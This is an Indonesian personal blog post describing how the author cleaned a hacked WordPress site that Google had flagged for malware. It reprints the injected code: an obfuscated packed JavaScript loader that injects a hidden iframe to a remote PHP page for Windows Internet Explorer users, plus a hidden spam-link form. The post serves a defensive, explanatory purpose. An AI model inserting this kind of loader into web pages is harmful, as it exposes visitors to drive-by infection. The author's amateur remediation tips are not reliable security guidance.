Artikel ini tentang Cara mengatasi website kena malware. Hampir 5 hari ini aku pusing mikirin website-website yang terkena hack, disusupi malware, diberi label ‘merah’ oleh google, dan dikomplain client (karena websiteku ikut terkena label merah juga).
Mengatasi Blog WordPress Yang Terkena Malware
Tetapi sekarang semua sudah beres. Nggak tau lagi kalau besok.. mudah-mudahan nggak ada hacker iseng lagi.
Ceritanya begini, sewaktu akan mengakses website, muncul peringatan bahwa websiteku mengandung malware.
“Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.”
Huwaduh.. baru pertama kali nich, apa yang salah. Lalu aku coba menghubungi customer service hosting yang ku pakai, mereka tidak bisa berbuat banyak, hanya menyuruhku menggunakan Google Webmaster Tools. Maka langkah-langkah untuk menyelesaikan masalah ini pun dimulai.
Cara Mengecek Website Kena Malware Atau Tidak
Kebanyakan hacker menyerang wordpress, jadi bagi yang mempunyai masalah sama mungkin pengalamanku ini bisa membantu.
1. Sign Up ke Google Webmaster Tools untuk verifikasi websitemu. https://www.google.com/webmasters/tools/ Masukan URL websitemu, kemudian verifikasi melalui penambahan meta tag pada header atau upload file untuk mengidentifikasi bahwa website itu benar-benar tanggung jawabmu,
2. Script yang dideteksi sebagai malware oleh Google adalah
<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))</sc ript>
<fo rm method="post" action="?" style="overflow: auto; width: 5pt; height: 1pt; position: absolute; display: none "><A HREF="http://businessactionf orafrica.org/?kids" TARGET="_self">kids clothes</A></fo rm>
Cara menghilangkan script malware tersebut
1. Hapus <? wp_head()?>; pada file header.php, biasanya sebelum </head>. Hal itu akan menghilangkan script Kids Clothes yang mengarah ke website businessactionofafrica.
Ada kendala pada saat menghapus wp_head, karena pada beberapa kasus, tampilan blog atau website wordpressmu akan kacau. Jika kamu bisa memperbaikinya, maka itu tidak menjadi masalah. Tetapi jika kamu kesulitan dan awam dalam hal coding, maka cara lain adalah install ulang wordpressmu.
2. Sebelum install ulang wordpress, kamu harus menghapus bersih file di public_html, hapus juga database dan username yang digunakan. Kalau kamu menggunakan fantastico pada saat dulu menginstall wordpress, maka kamu harus remove wordpress dari fantastico juga. Setelah selesai, tetap saja kamu harus menghapus bersih semua file yang ada di public_html. Oh ya, tetapi terlebih dahulu backup semua file penting dalam wordpress seperti database (gunakan PHP MyAdmin untuk import database menjadi .sql), kemudian download file di folder uploads, plugins dan themes. Di Zip dulu foldernya agar bisa didownload. Pada postingan berikutnya nanti aku akan berbagi cara backup wordpress dengan cepat.
3. Kunjungi kembali Google webmaster tools, klik pada keterangan malware dan centang tanda review untuk meminta Google mereview ulang websitemu dan menghilangkan ‘tanda merah’.
Untuk pencegahan dari hacker usil, ada baiknya kamu mencari informasi dari website lain lebih banyak. Karena aku tidak ahli dalam hal itu, buktinya dalam dua bulan ini sering kena hack, hehe.. Selamat mencoba dan semoga berhasil
Cara Mencegah Website Kena Malware
- Ganti password email, login web, dll.
- Backup database dan semua gambar di wp-content/uploads
- Backup plugins
- Jangan gunakan plugin bajakan / nulled karena akan disusupi script untuk membajak blogmu
- Pastikan theme wordpress yang kamu gunakan bersih dan diunduh dari sumber yang terpercaya
- Minta tolong kepada pihak web hosting untuk setting hostingnya dari awal atau dibersihkan
- Install ulang wordpress, theme dan seluruh plugin.
Cara mengatasi website kena malware mungkin akan kurang efektif jika kamu memiliki banyak website dalam satu web hosting. Biasanya sih kalau web hostingmu sudah terinfeksi, maka web lainnya akan kena juga. Kebetulan aku hanya punya satu web saja sehingga mudah maintenancenya ketika blog terkena malware seperti ini.
